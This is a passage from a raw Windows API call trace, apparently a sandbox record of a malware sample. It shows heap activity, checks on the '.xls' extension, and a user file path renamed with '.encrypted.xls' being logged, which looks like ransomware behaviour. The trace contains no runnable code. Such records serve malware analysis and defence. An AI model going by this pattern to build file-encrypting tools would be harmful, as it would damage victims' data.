0x7af588 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.530] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="s", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="xls", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0034.530] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".xls", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.530] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.531] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af598 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.531] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1878 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1828 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc10 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a08 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.531] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.531] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a08 | out: hHeap=0x770000) returned 1 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3e8 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae928 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3e8 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae928 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ca18 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.532] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce50 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af558 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0034.532] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.532] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af558 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xf0) returned 0x7c50e0 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c9a0 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce50 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1850 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.533] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af588 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af588 | out: hHeap=0x770000) returned 1 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889538 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.533] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cdd8 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889538 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab338 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c730 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18a0 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ca18 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc10 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1828 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1878 | out: hHeap=0x770000) returned 1 [0034.533] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8897d8 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce38 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1738 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af378 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1f0) returned 0x7c95d0 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20a) returned 0x7b8158 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5f8 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b8158 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5f8 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ae948 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.534] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x38) returned 0x7c2240 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x935008 [0034.534] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889628 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0034.535] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0034.535] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x15a3, lpOverlapped=0x0) returned 1 [0034.535] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x15a3, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0034.535] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0034.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.535] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ccd0 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af598 [0034.535] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.encrypted.xls\r\n", cchWideChar=129, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 129 [0034.535] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x81) returned 0x7bbc00 [0034.536] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.encrypted.xls\r\n", cchWideChar=129, lpMultiByteStr=0x7bbc00, cbMultiByte=129, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\PRo_og0ZRj3K\\HDwgQZq\\Shrw\\2KU7thE4LQT.encrypted.xls\r\n", lpUsedDefaultChar=0x0) returned 129 [0034.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ccd0 | out: hHeap=0x770000) returned 1 [0034.536] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x90) returned 0x7c38b0 [0034.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7bbc00 | out: hHeap=0x770000) returned 1 [0034.536] WriteFile (in: hFile=0x128, lpBuffer=0x7c38b0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7c38b0*, lpNumberOfBytesWritten=0x6aee3c*=0x80, lpOverlapped=0x0) returned 1 [0034.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c38b0 | out: hHeap=0x770000) returned 1 [0034.536] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0034.536] CloseHandle (hObject=0x128) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889628 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8b0 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c95d0 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af558 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdd8 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8891f0 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0034.537] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0034.537] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0034.537] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0034.537] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.537] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.537] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0034.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0034.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0034.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0034.537] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0034.537] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0034.537] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb08 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0034.538] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4f8 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4a8 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889970 [0034.538] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x76e10000 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0034.538] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0034.538] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0034.538] RtlAllocateHeap 